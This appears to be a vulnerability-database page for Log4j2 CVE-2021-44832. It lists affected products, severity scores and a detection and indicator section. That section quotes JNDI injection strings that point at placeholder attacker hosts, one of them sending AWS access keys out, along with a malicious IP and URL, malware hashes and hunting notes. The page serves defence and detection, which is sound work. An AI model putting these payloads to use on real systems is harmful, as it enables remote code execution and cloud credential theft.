cbcvebase.
CVE-2021-44832
published 2021-12-28

CVE-2021-44832: Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when…

PriorityP183medium6.6CVSS 3.1
AVNACHPRHUINSUCHIHAH
ITWVulnCheck KEVRansomware
Exploited in the wild
EPSS
97.91%
99.9th percentile
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.

Affected

76 ranges· showing 25
VendorProductVersion rangeFixed in
apachelog4j
apachelog4j>= 2.0.1 < 2.3.22.3.2
apachelog4j>= 2.13.0 < 2.17.12.17.1
apachelog4j>= 2.4 < 2.12.42.12.4
apachelogging
apachetika
apache_software_foundationapache_log4j2>= log4j-core < 2.17.12.17.1
ciscocloudcenter
debianapache-log4j2< apache-log4j2 2.17.1-1 (bookworm)apache-log4j2 2.17.1-1 (bookworm)
debiandebian_linux
fedoraprojectfedora
fedoraprojectfedora
oraclecommunications_brm_elastic_charging_engine< 12.0.0.4.612.0.0.4.6
oraclecommunications_brm_elastic_charging_engine
oraclecommunications_diameter_signaling_router8.0.0.0 – 8.5.1.0
oraclecommunications_diameter_signaling_router8.3.0.0 – 8.5.1.0
oraclecommunications_interactive_session_recorder
oraclecommunications_interactive_session_recorder
oraclecommunications_offline_mediation_controller< 12.0.0.4.412.0.0.4.4
oraclecommunications_offline_mediation_controller
oracleflexcube_private_banking
oraclehealth_sciences_data_management_workbench
oraclehealth_sciences_data_management_workbench
oraclehealth_sciences_data_management_workbench
oraclepolicy_automation12.2.0 – 12.2.24

Detection & IOCsextracted from sources · hover to see the quote

command${jndi:ldap://attacker_controled_website/payload_to_be_executed}
command${jndi:ldap://${env:AWS_ACCESS_KEY_ID}.${env:AWS_SECRET_ACCESS_KEY}.}
command${jndi:ldap://{malicious website}/a}
ip45.136.230.191
urlhttp://45.136.230.191:4000/D234R23
hashffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f
hashcee38fd125aa3707DC77351dde129dba5e5aa978b9429ef3e09a95ebf127b46b
hash7f0deab21a3773295319e7a0afca1bea792943de0041e22523eb0d61a1c155e2
hashcac73029ad6a543b423822923967f4c240d02516fab34185c59067896ac6eb99
hash29a3ae1d32e249d01b39520cd1db27aa980e646d83694ff078424bed60df9304
hash63bdd396ff6397b3a17913badb7905c88e217d0a8cf864ab5e71cc174a4f97a1
hash63ebb998ebbbfe3863214a85c388fc23b58af4492b2e96eb53c436360344d79d
hash912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
hashf2faa8a91840de16efb8194182bcfa9919b74a2c2de40d6ed4791a3308897a01
hash48514e6bb92dd9e24a16a4ab1c7c3bd89dad76bef53cec2a671821024fadcb2b
hash61239d726c92c82f553200ecbec3ac18d251902fb9ca4d4f52263c82374a5b75
hashe4af7f048e93b159e20cc3efbacdb68e3c1fb213324daf325268ccb71f6c3189
filenamevmware_kb.exe
filenamewatcher.exe
pathC:\Windows\System32\temp\RuntimeBrokerService.exe
filenameIIS Temporary Compressed Files.zip
filenamescanner.exe
snort
SIDs: 58722-58744, 58751, 58784-58790, 58795, 58801, 58811-58814
yara
Java.Malware.CVE_2021_44228-9915816-1
yara
PUA.Java.Tool.CVE_2021_44228-9916978-0
  • CVE-2021-44832 requires attacker control of the Log4j configuration to use a JDBC Appender with a JNDI LDAP data source URI pointing to an attacker-controlled LDAP server; detection is consistent with Log4Shell (CVE-2021-44228) coverage and previously released signatures apply.
  • Monitor HTTP request headers (X-Api-Version, User-Agent, Referer, X-Druid-Comment, Origin, Location, X-Forwarded-For, Cookie, X-Requested-With, X-Forwarded-Host, Accept, Authentication, Authorization) and POST body fields for JNDI lookup strings starting with ${jndi:protocol://.
  • Detect outbound LDAP/JNDI lookup requests originating from application servers, especially those containing ${jndi: patterns in log data, as indicators of active exploitation attempts.
  • In the AvosLocker campaign exploiting Log4Shell/CVE-2021-44832 on VMware Horizon UAGs, attackers used encoded PowerShell with DownloadString to fetch second-stage payloads; hunt for wmiprvse.exe spawning PowerShell with -enc or -EncodedCommand flags.
  • Hunt for the Sliver C2 payload dropped as 'vmware_kb.exe' and Cobalt Strike beacons distributed via PDQ Deploy in post-exploitation of Log4j-vulnerable VMware Horizon systems.
  • ·CVE-2021-44832 is only exploitable when an attacker already has control over the Log4j configuration (e.g., via a JDBC Appender with an attacker-controlled JNDI LDAP data source URI); it is not exploitable in default or unmodified configurations.
  • ·The fix for CVE-2021-44832 limits JNDI data source names to the java protocol only; deployments still using Log4j 2.17.0 (without upgrading to 2.17.1, 2.12.4, or 2.3.2) remain vulnerable if an attacker can influence the configuration.

CVSS provenance

nvdv3.16.6MEDIUMCVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.08.5HIGHAV:N/AC:M/Au:S/C:C/I:C/A:C
ghsa10.0CRITICAL
osv10.0CRITICAL
vulncheck6.6MEDIUM
vendor_cisco10.0CRITICAL
vendor_apache6.6
vendor_debian6.6MEDIUM
vendor_oracle6.6MEDIUM
vendor_redhat6.6MEDIUM
vendor_ubuntu6.6MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.